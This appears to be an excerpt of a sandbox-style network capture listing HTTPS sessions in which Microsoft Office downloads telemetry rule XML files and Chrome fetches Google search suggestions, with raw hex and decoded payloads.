2024-11-25 23:25:18 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.6	49720	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:17 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:18 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:18 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232518Z-174f7845968glpgnhC1EWR7uec0000000up00000000004hr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:18 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.6	49721	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:17 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:18 UTC	522	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:18 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232518Z-174f7845968swgbqhC1EWRmnb40000000utg0000000001vc x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:18 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.6	49722	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:20 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:20 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:20 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232520Z-174f7845968swgbqhC1EWRmnb40000000up0000000000653 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:20 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.6	49723	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:20 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:20 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:20 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: f5d49257-301e-005d-758c-3fe448000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232520Z-174f7845968j6t2phC1EWRcfe80000000uqg0000000004b9 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:20 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.6	49724	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:20 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:20 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:20 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232520Z-174f78459688l8rvhC1EWRtzr000000007a000000000008a x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:20 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.6	49725	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:20 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:20 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:20 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232520Z-174f7845968glpgnhC1EWR7uec0000000uw0000000000066 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:20 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.6	49726	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:20 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:20 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:20 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232520Z-174f7845968cpnpfhC1EWR3afc0000000u900000000001zc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:20 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.6	49732	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:22 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:23 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:23 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232522Z-174f7845968glpgnhC1EWR7uec0000000uv00000000000dt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:23 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49733	142.250.181.100	443	5028	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:22 UTC	595	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-25 23:25:23 UTC	1266	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:23 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-_yPXF2R0a2g2D-fhFd8tiA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-25 23:25:23 UTC	124	IN	Data Raw: 33 32 30 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 77 69 6c 6c 20 74 68 65 72 65 20 62 65 20 61 20 61 72 63 61 6e 65 20 73 65 61 73 6f 6e 20 33 22 2c 22 6c 65 78 69 20 72 6f 64 72 69 67 75 65 7a 20 76 6f 6c 6c 65 79 62 61 6c 6c 22 2c 22 76 20 62 75 63 6b 73 20 72 65 64 65 65 6d 20 63 6f 64 65 73 22 2c 22 73 70 61 63 65 78 20 73 74 61 72 6c 69 6e 6b 20 6c 61 75 6e 63 68 20 Data Ascii: 320)]}'["",["will there be a arcane season 3","lexi rodriguez volleyball","v bucks redeem codes","spacex starlink launch
2024-11-25 23:25:23 UTC	683	IN	Data Raw: 66 61 6c 63 6f 6e 20 39 22 2c 22 62 69 6c 6c 62 6f 61 72 64 20 6d 75 73 69 63 20 61 77 61 72 64 73 22 2c 22 6d 69 73 73 69 73 73 69 70 70 69 20 74 65 61 63 68 65 72 20 64 6f 67 20 74 72 65 61 74 73 22 2c 22 63 61 64 65 20 63 75 6e 6e 69 6e 67 68 61 6d 20 69 6e 6a 75 72 79 20 72 65 70 6f 72 74 22 2c 22 6b 72 69 73 70 79 20 6b 72 65 6d 65 20 67 72 69 6e 63 68 20 64 6f 75 67 68 6e 75 74 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 Data Ascii: falcon 9","billboard music awards","mississippi teacher dog treats","cade cunningham injury report","krispy kreme grinch doughnuts"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc
2024-11-25 23:25:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49731	142.250.181.100	443	5028	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:22 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49734	142.250.181.100	443	5028	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:22 UTC	498	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-25 23:25:23 UTC	1018	IN	HTTP/1.1 200 OK Version: 698674578 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 25 Nov 2024 23:25:23 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
